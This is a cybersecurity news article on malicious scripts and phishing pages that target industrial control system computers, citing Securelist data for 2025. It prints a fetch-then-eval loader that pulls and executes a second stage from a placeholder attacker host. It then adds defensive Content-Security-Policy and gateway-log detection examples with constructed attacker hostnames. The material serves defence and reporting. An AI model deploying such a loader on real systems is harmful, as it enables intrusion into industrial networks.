Industrial automation systems have become the latest battleground for sophisticated cybercriminals who are deploying cleverly crafted malicious scripts and phishing pages to compromise ICS computers.
Over the first half of 2025, attackers have increasingly shifted to web-based attack vectors, exploiting legacy interfaces, weak authentication, and outdated software in operational technology environments.
These threat actors deliver malicious JavaScript payloads via compromised websites and phishing emails that mimic legitimate vendor pages or internal dashboards.
Once the victim opens the page, the script runs without any further interaction and pulls next-stage payloads designed to harvest credentials, establish backdoors, and move laterally within the network.
Detection data from Securelist puts the percentage of ICS computers on which malicious scripts and phishing pages were blocked at 6.49% in Q2 2025, slightly below the previous quarter.
Despite the modest decrease, this category remains the most prevalent web-based threat to industrial networks, surpassing traditional malware families such as trojans and keyloggers.
Regional analysis shows that Africa and South-East Asia saw the highest infection attempts, while Northern Europe remained the least targeted.
The decline in blocked scripts may reflect both improved defenses and the attackers’ pivot toward more targeted, low-volume campaigns.
Securelist analysts identified that many of these attacks leverage common industrial protocols—such as Modbus and OPC UA—to embed command sequences within ostensibly benign script hosts.
By masquerading control commands as part of a legitimate maintenance interface, threat actors can manipulate programmable logic controllers (PLCs) and supervisory control and data acquisition (SCADA) systems without triggering conventional antivirus signatures.
[Figure: Percentage of ICS computers on which the activity of malicious objects from various categories was blocked (Source – Securelist)]
The attackers often chain multiple JavaScript modules: an initial loader script pulls a second-stage downloader, which in turn retrieves a lightweight reverse shell written in Node.js.
While most incidents involve credential harvesting and reconnaissance, several high-impact campaigns enabled direct manipulation of industrial processes.
In one case, adversaries altered setpoints on a chemical processing line, causing temperature fluctuations that triggered emergency shutdowns.
In another, attackers used phishing pages that mimicked a well-known remote support portal to steal privileged accounts, later deploying malicious scripts that disabled safety interlocks.
These operations underscore the urgent need for deep-inspection proxies and multi-factor authentication on every ICS-facing web interface.
Infection Mechanism and Script Delivery
The initial infection typically begins with a phishing email containing a link to a cloned vendor portal. When the page is opened, a JavaScript snippet on it fetches code from an attacker-controlled server and executes it with eval(). The loader looks like the following (the attacker's URL was truncated in the original and is represented here by a placeholder):
[script]
// Loader fetches and executes the second-stage payload.
// SECOND_STAGE_URL stands in for the attacker-controlled URL that was truncated in the original.
fetch(SECOND_STAGE_URL)
  .then(response => response.text())
  .then(code => eval(code));
[/script]
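As an added example (not code from the article or from the Securelist report), the following minimal Content-Security-Policy evaluator shows why the fetch()-then-eval() chain above runs under a permissive policy and is stopped under a strict one. It models only the directives relevant to this chain (connect-src for fetch(), script-src for eval(), with default-src as the fallback); the origins, policies and function names are assumptions made for the example.

```javascript
// Added example, not from the article or the Securelist report: a minimal CSP
// evaluator for the fetch() -> eval() loader chain. Only connect-src, script-src
// and the default-src fallback are modelled; origins and policies are assumed.

// Parse "directive value value; directive value" into a Map of directive -> [values].
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...values] = tokens;
    // A repeated directive is ignored by browsers; keep the first occurrence.
    if (!directives.has(name.toLowerCase())) {
      directives.set(name.toLowerCase(), values.map(v => v.toLowerCase()));
    }
  }
  return directives;
}

// Look up a fetch directive, falling back to default-src. Returns null when
// neither is present, meaning the policy imposes no restriction on that step.
function effectiveSources(directives, name) {
  if (directives.has(name)) return directives.get(name);
  if (directives.has('default-src')) return directives.get('default-src');
  return null;
}

// Does a source list permit loading `url` from a page served at `pageOrigin`?
function sourceListAllows(sources, url, pageOrigin) {
  const target = new URL(url);
  for (const src of sources) {
    if (src === '*') return true;
    if (src === "'self'") { if (target.origin === pageOrigin) return true; continue; }
    if (src.startsWith("'")) continue; // 'none', 'unsafe-eval' etc. never match a host
    // Host source: optional scheme, optional leading "*." wildcard.
    let host = src, scheme = null;
    const schemeIdx = host.indexOf('://');
    if (schemeIdx !== -1) { scheme = host.slice(0, schemeIdx); host = host.slice(schemeIdx + 3); }
    if (scheme && scheme !== target.protocol.replace(':', '')) continue;
    if (host.startsWith('*.')) {
      if (target.hostname.endsWith(host.slice(1))) return true;
    } else if (host === target.hostname) {
      return true;
    }
  }
  return false;
}

// Walk the two steps of the loader chain under a policy and report which one
// the browser would block, if any.
function evaluateLoaderChain(policy, pageOrigin, stageUrl) {
  const d = parseCsp(policy);
  const connect = effectiveSources(d, 'connect-src');
  const script = effectiveSources(d, 'script-src');
  // Step 1: fetch() is governed by connect-src (absent directive => allowed).
  const fetchAllowed = connect === null || sourceListAllows(connect, stageUrl, pageOrigin);
  // Step 2: eval() needs 'unsafe-eval' in script-src (or its fallback); with no
  // script-src/default-src directive at all, CSP does not restrict eval().
  const evalAllowed = script === null || script.includes("'unsafe-eval'");
  if (!fetchAllowed) return { blockedAt: 'fetch', fetchAllowed, evalAllowed };
  if (!evalAllowed) return { blockedAt: 'eval', fetchAllowed, evalAllowed };
  return { blockedAt: null, fetchAllowed, evalAllowed };
}

// Constructed sample (hypothetical hosts): an ICS-facing portal and a
// second stage hosted on an attacker-controlled server.
const PAGE_ORIGIN = 'https://portal.example-vendor.test';
const STAGE_URL = 'https://cdn.example-attacker.test/stage2.js';

// Weak policy: wildcard connect-src plus 'unsafe-eval' lets the whole chain run.
const WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-eval'; connect-src *";
// Strict policy: fetch() limited to the page's own origin, and no 'unsafe-eval'.
const STRICT_CSP = "default-src 'none'; script-src 'self'; connect-src 'self'";

console.log(evaluateLoaderChain(WEAK_CSP, PAGE_ORIGIN, STAGE_URL));   // blockedAt: null
console.log(evaluateLoaderChain(STRICT_CSP, PAGE_ORIGIN, STAGE_URL)); // blockedAt: 'fetch'
```

The evaluator also makes the limit of the control clear: a CSP is set by the server that serves the page, so it protects your own ICS-facing dashboards and vendor portals against an injected loader, but it does nothing on a cloned phishing site that the attacker hosts, where the browser runs whatever the attacker's own policy permits. On the phishing side the effective controls are mail filtering, URL reputation and MFA, not CSP.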
The loader then writes a Node.js-based shell to disk and registers it as a system service so that it survives reboots. Script running inside a browser sandbox cannot write files or register services on its own, so this stage depends on a component that runs outside the browser, a point the description above leaves open.
It also injects WebSocket hooks into the browser process to tunnel PLC commands over the network channel the browser already has open.
Detection is evaded further by obfuscating function names and Base64-encoding payloads that are decoded only at runtime.
Continuous monitoring of web gateway logs for script retrievals from unapproved hosts, together with a strict Content Security Policy on ICS-facing web interfaces, can break this chain of execution and stop unauthorized script retrieval.
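To make the gateway-log side of that recommendation concrete, here is an added example (not code from the article or the Securelist report) of a small detector run over constructed web-gateway log lines. It flags the loader chain as two linked events from one client: a script body fetched from a host outside an approved allowlist, followed within a short window by a WebSocket upgrade to that same host. The log format, hostnames, allowlist and time window are assumptions made for this example.

```javascript
// Added example, not from the article or the Securelist report: detect the
// "script from unapproved host, then WebSocket to the same host" pattern in
// constructed gateway logs. Format, hosts and thresholds are assumptions.

// Constructed log lines: ISO timestamp, client IP, method, URL, content-type, status.
const SAMPLE_LOG = `
2025-06-12T08:01:10Z 10.20.1.15 GET https://portal.example-vendor.test/login text/html 200
2025-06-12T08:01:12Z 10.20.1.15 GET https://cdn.example-attacker.test/stage2.js application/javascript 200
2025-06-12T08:01:15Z 10.20.1.15 GET wss://cdn.example-attacker.test/ws upgrade 101
2025-06-12T08:02:00Z 10.20.1.22 GET https://cdn.example-vendor.test/app.js application/javascript 200
2025-06-12T08:02:03Z 10.20.1.22 GET wss://hmi.plant.internal/live upgrade 101
2025-06-12T08:03:40Z 10.20.1.31 GET https://cdn.example-attacker.test/stage2.js application/javascript 200
`;

// Hosts from which script delivery is expected (hypothetical allowlist).
const ALLOWED_SCRIPT_HOSTS = new Set(['cdn.example-vendor.test', 'hmi.plant.internal']);
// How long after a script fetch a follow-up WebSocket still counts as the same chain.
const WINDOW_MS = 60 * 1000;

// Parse one log line per entry into fields the detector needs.
function parseLog(text) {
  return text.trim().split('\n').map(line => {
    const [ts, client, method, url, contentType, status] = line.trim().split(/\s+/);
    const u = new URL(url);
    return {
      time: Date.parse(ts), client, method,
      host: u.hostname, scheme: u.protocol, path: u.pathname,
      contentType, status: Number(status),
    };
  });
}

function isScriptFetch(e) {
  return e.status === 200 &&
    (e.contentType === 'application/javascript' || e.contentType === 'text/javascript');
}

function isWebSocketUpgrade(e) {
  return e.status === 101 && (e.scheme === 'wss:' || e.scheme === 'ws:');
}

// One alert per unapproved script fetch. Severity is 'high' when the same client
// opens a WebSocket to the same host within WINDOW_MS, 'medium' otherwise so
// that a lone retrieval from an unknown host still gets reviewed.
function detectLoaderChain(entries) {
  const sorted = [...entries].sort((a, b) => a.time - b.time);
  const alerts = [];
  for (let i = 0; i < sorted.length; i++) {
    const e = sorted[i];
    if (!isScriptFetch(e) || ALLOWED_SCRIPT_HOSTS.has(e.host)) continue;
    let chained = false;
    for (let j = i + 1; j < sorted.length && sorted[j].time - e.time <= WINDOW_MS; j++) {
      const f = sorted[j];
      if (f.client === e.client && f.host === e.host && isWebSocketUpgrade(f)) {
        chained = true;
        break;
      }
    }
    alerts.push({ client: e.client, host: e.host, path: e.path, severity: chained ? 'high' : 'medium' });
  }
  return alerts;
}

console.log(detectLoaderChain(parseLog(SAMPLE_LOG)));
```

Real gateway logs rarely carry response bodies, so the Base64 decoding happens out of sight; the host-level correlation above is what remains visible at the proxy, and the allowlist is the part that needs maintenance as legitimate vendor CDNs change.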
The post Threat Actors Attacking ICS Computers With Malicious Scripts and Phishing Pages appeared first on Cyber Security News.